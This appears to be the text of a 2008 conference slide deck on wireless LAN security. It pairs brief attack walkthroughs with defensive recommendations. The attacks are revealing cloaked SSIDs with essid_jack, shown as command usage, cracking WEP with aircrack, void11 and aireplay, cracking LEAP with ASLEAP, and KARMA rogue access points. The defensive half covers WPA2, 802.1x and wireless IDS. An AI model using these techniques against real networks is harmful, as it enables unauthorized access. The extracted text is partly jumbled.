| Date post: | 05-Dec-2014 |
| Category: |
Business |
| Upload: | digitallibrary |
| View: | 6,123 times |
| Download: | 3 times |
1
How I Hacked Your Wireless LAN(And how to stop me...)How I Hacked Your Wireless LAN(And how to stop me...)
JON GREEN, CISSP
“How I Hacked Your Wireless LAN – And How to Stop Me”
Session A3, April 27 2008
Disclaimer• I might be smart enough to hack your wireless LAN, but I
don’t have time. I work for Aruba and have an 2 year old child to chase around. Don’t blame me.
2
Is This How You Think About Wireless?
The truth:Wireless is MORE secure than wiredsecure than wired(if you do it right)
Wired Network Security Questions
On your wired network...• Do you authenticate all users and devices?• Do you encrypt all traffic?Do you encrypt all traffic?• Do you control access to network resources
based on user identity?
Wi l l t d ll f thi b d i• Wireless lets you do all of this – by design
3
802.11 Technology and Vulnerabilities
PHY/MAC802.11a802.11b,
EAP/TLS,
RegulatoryDomain
Extensions
802.11g,Europe5 GHz,WPA
802.11i,WPA2,Japan
Radio ResourceMgmt, Fast Roaming,
early mesh deployments
MIMO,WAVE,Mesh,
ExternalI t t k
Performance,Net. Mgmt,3.65 GHz
Technology
1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009
EAP-MD5QoS
Japan5GHz,
EAP-FAST
Internetwork,Mgmt. Frame
ProtectionPEAP,TTLSLEAP
Windows wardriving
tools, growing attack tool
Sophisticated WEP attack tools, attacks against WPA-PSK, PHY jamming tools
commodityWIDS evasion,client attacks
Metasploit for Wireless Critical client driver vulns
AP Fuzzing?RADIUS Fuzzing?
TJX
Best Buy, Houston Court
System
BJ's
GE Money, PG&E
1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009
Vulnerabilities
Early wardriving,early WEP
attacks
attack tool sophistication
Hotspotimpersonation,LEAP exposed
y
Hotspotmanipulation,QoS attacks,
WIDS fingerprinting
client attacks gaining
popularity, fuzzing
RADIUS Fuzzing?802.11 VA Tools?
Attacks Against TKIP?Lowe's
BJ s
How NOT to Deploy Wireless!How NOT to Deploy Wireless!
4
Doing Nothing
• Wireless LAN equipment is cheap and easily available• If the IT department doesn’t deploy wireless, someone
else will• Where is the “security perimeter” today?• How do you enforce “No Wireless” policies?
What if we ignore wireless?
YourCompany
New York City
YourYouremployee
Employee’s a subscriber to public Wi-Fi hotspot serviceEmployee’s laptop automatically associates with public Wi-Fi hotspotPlugs into wired corporate networkTraffic bridged between public hotspot and enterprise network
5
RF Engineering• Using directional antennas to
direct and limit RF coverage does not work• RF is invisible• Physical environments change• Physical environments change
• Lowering transmit power or placing access points (APs) away from outside walls to limit RF “leakage” does not work
• Set RF coverage to optimize user experience not touser experience – not to control leakage
SSID Cloaking
• Some APs offer a feature to hide the SSID (Service Set Identifier or “wireless network name”) in ad ertisementsname”) in advertisements
• Hiding the SSID can discourage but cannot secure
• A person intent on network intrusion can run a simple tool to instantly reveal the SSID• The SSID should never be treated as though it were a
password
6
Discovering Cloaked SSIDs
linux:~# ./essid_jack -hEssid Jack: Proof of concept so people will stop calling an ssid a password.
Usage: ./essid jack -b <bssid> [ -d <destination mac> ] [ -c <channel number> ] [ -ig _j [ ] [ ] [ccc.gif <interface name> ]
-b: bssid, the mac address of the access point (e.g. 00:de:ad:be:ef:00)-d: destination mac address, defaults to broadcast address.-c: channel number (1-14) that the access point is on,defaults to current.-i: the name of the AirJack interface to use (defaults toaj0).
linux:~# essid_jack -b 00:03:2d:de:ad: -c 11Got it the essid is (escape characters are c style):Got it, the essid is (escape characters are c style):“s3kr1t_wl4n"
MAC Address Filtering
• Some APs offer “MAC address filtering”
• Does not scale to large networks
• Trivial to defeat
7
WEP
• WEP stands for “Wired Equivalent Privacy”• Badly broken
Static versus Dynamic WEP• Static versus Dynamic WEP• Static WEP: everyone uses the same key, all the time• Dynamic WEP: everyone uses a different key, assigned
at each authentication
• Static WEP is evil. Avoid it. • Dynamic WEP is slightly better, but it is still
WEP
Attacking WEP - Aircrack• Goal: Capture frames with weak IVs (Initialization Vectors)• Need 50K-200K frames for 64-bit key, 200K-700K for 128-bit
key
8
Attacking WEP – Speeding things up• Use “void11” to deauthenticate clients from the WLAN,
then let them reassociate – this generates valid data traffic• But this interferes with normal WLAN operation – people will notice
• Use “Aireplay”• Capture a valid ARP packet• Replay it to the WLAN over and over• Generate lots of frames
Result:• Result:• 64-bit keys cracked in ~5 minutes • 128-bit keys cracked in ~10 minutes.
Cisco LEAP
• Cisco invented LEAP to solve key distribution problems
• Vulnerable to dictionary attacks• LEAP cracking tool is called ASLEAP• Currently considered
broken and unsuitablefor use
9
How to Stop MeHow to Stop Me
Let’s start here...AES-CCMP Block Diagram
E E...paddingpadding
... E
BrB0 B1 Bk
Header Message Tag
...
Not encrypted
00 Bk+1...
DC
Sm
A1 AmE EA0 E
yp
Sm...S1 SmS0
DC
10
PROTECTING THE AIRRF Spectrum SecurityWireless IDS
PROTECTING THE NETWORKStrong Authentication
PROTECTING THE CONNECTIONPer-Packet Authentication, CentralizedEncryption
PROTECTING THE USERStateful Per User Firewalls
A Layered Approach to Wireless SecurityA Layered Approach to Wireless Security
PROTECTING THE DATAWPA2 and AES
Enterprise Assets
Centralization solves security and TCO for WLANs
Centralized
Centralization is the First StepCentralization is the First Step
Centralized Mobility Controller
Policy
Mobility
Forwarding
Management
“Thin” Access Points802.11a/b/g
Antennas
Forwarding
Encryption
Authentication
“Fat” Access Points
11
Controlling “Uncontrolled Wireless”
• AP detection• See all APs
• AP classification• AP classification• Are they neighbors?• Or are they a threat?
• Rogue containment• Stop users from
accessing rogue APs and leave neighbors galone
Wireless Intrusion Detection/Protection
12
Authentication with 802.1x
• Authenticates users before granting access to L2 media
• Makes use of EAP (Extensible Authentication Protocol) – evolved from PPP• PEAP, EAP-TLS, EAP-TTLS,
etc.
802 1 th ti ti• 802.1x authentication happens at L2 – users will be authenticated before an IP address is assigned
Authentication with 802.1x
EAPOL (EAP over LAN) RADIUS
E t d T l
AuthenticationServerAP/Controller
STA
Encrypted Tunnel
13
802.1x Acronym Soup
• PEAP (Protected EAP)• Uses a digital certificate on the network side• Password or certificate on the client side• Password or certificate on the client side
• EAP-TLS (EAP with Transport Level Security)• Uses a certificate on network side• Uses a certificate on client side
• TTLS (Tunneled Transport Layer Security)• Uses a certificate on the network side
P d t k tifi t th li t id• Password, token, or certificate on the client side
• EAP-FAST• Cisco proprietary• Do not use – known security weaknesses
Encrypt the Data
• If intruders can’t read the data, there’s no need to worry where it goes• WEP
• Encryption using RC4• Simple to do, easy to crack• No key management• Don’t do it
• TKIP (Temporal Key Integrity Protocol)• Encryption using RC4• Works on legacy hardware• No major weaknesses known
• CCMP/AES• CCMP/AES• Encryption using AES• Considered state-of-the-art • FIPS 140-2 approved• May require new hardware
14
Combining Authentication & Encryption: WPA
• WPA == Wi-Fi Protected Access
• WPA“• Wi-Fi Alliance “standard” based on pre-802.11i
• Includes TKIP for encryption
• WPA2• Wi-Fi Alliance “standard” based on ratified 802.11i• Includes TKIP and CCMP for encryption
• For both:• WPA-Enterprise == 802.1x for authentication, dynamic encryption• WPA-Personal == pre-shared authentication key
Pre-Shared Key Authentication Cannot Scale
• WPA/WPA2 accommodates authentication using IEEE 802.1X or a pre-shared key• PSK authentication is "WPA-Personal", 802.1X is "WPA-Enterprise“
• WPA-Personal is deployed without the complexity of IEEE 802.1X, no EAP type configuration• Attractive to deploy, but insecure
• Like WEP, PSK authentication is weak and cannot scale• Subject to offline dictionary attacks• Subject to offline dictionary attacks• A stolen/lost device with PSK mandates rotation of all PSK's
throughout the organization• How many people require knowledge of the key?• Is the key stored on laptops accessible to users?
15
Configure WPA Properly• Configure the Common
Name of your RADIUS server (matches CN in server certificate)server certificate)
• Configure trusted CAs (an in-house CA is better than a public CA)
• ALWAYS validate the server certificateDo not allow users to• Do not allow users to add new CAs or trust new servers
• Enforce with group policy
Captive Portals
• Browser-based authenticationSSL encrypted• SSL encrypted
• Permits registered user or guest access
• No inherent link-layer encryption
• Use with caution!
16
Authorize the Data
• Most organizations do a decent job of authentication (who the user is), but a poor job of authorization (what the user is allowed to do)
• Mobile networks are typically multi-use• Authentication provides you with user identity – now use
it! Identity-aware firewall policies can restrict what a user can do, based on that user’s needs
EmployeeRadius Server
EmployeeRadius Server
Virtual AP 1SSID: CORP
Virtual AP 2SSID: GUEST
Guest user
VoIP Device
Contractor
Default VLAN
Layer 2 Switch
RouterFirewall Captive
Portal
DHCPPool
Firewall
Virtual AP 1SSID: CORP
Virtual AP 2SSID: GUEST
Guest user
VoIP Device
Contractor
Default VLAN
Layer 2 Switch
RouterFirewall Captive
Portal
DHCPPool
Firewall
Why Worry About Authorization?
Where is the “network perimeter” today?
Mobility brings us:
Ouch!
Disappearance of physical securityNew mobile users, devices appearing everydayIncreased exposure to malware
Assuming that “the bad guys are outside the firewall, the good guys are inside” is a recipe for disaster
17
Today’s Wireless Gold Standard
• Centralized wireless• Keep clients updated – drivers too!• Wireless intrusion detection
• Control uncontrolled wireless• Control uncontrolled wireless• Locate and protect against rogue APs
• WPA-2• Device authentication using 802.1x and PEAP• User authentication using 802.1x and PEAP• AES for link-layer encryption
• Strong passwords• SecureID or other token-card products• Strong password policies
• Authorization with identity-aware firewalls• Protect wireless users from other wireless users• Another layer of defense
What’s Left?What’s Left?
18
Attacking Preferred Networks List (PNL)
• Multiple tools to abuse preferred network list on clients• Hotspotter
R Gl AP• RawGlueAP• KARMA
• When and how stations roam still driver-implementation dependent
• Can be abused by attackers
KARMA
• Listens for probes in monitor mode• Becomes AP for all probed networks• Includes extensive support for fake services to manipulate
client connectivity (XML)• Fake SMB, FTP, HTTP
• Bring Your Own eXploit (BYOX) model
“… a number of client-side exploits have been written, tested pand demonstrated within this framework. Some may be included in a future release. Automated agent deployment is also planned.”
19
KARMA Example
Windows XP PNL Weakness
• Empty PNL, XP still probes with uninitialized memory contents as SSID
• Will associate to networks using this SSID, fno popup notification
20
Client Drivers• Basic secure programming rule: Sanitize all user input• “Fuzzing” attacks send random data to software inputs
• Stuff that comes in over the air is user input
802 11 i d th l t f d i ft• 802.11n is around the corner – lots of new driver software going into production• Are these well written? Well tested? Secure?
Summary
• At a minimum, you must put measures in place to control “uncontrolled wireless”
• Wireless networks are more secure than• Wireless networks are more secure than the average wired network• But only when properly secured
• Wireless security has evolved rapidly in the past 4 years – tools and information are not common knowledge• Use vendors to help you – they live this every
day
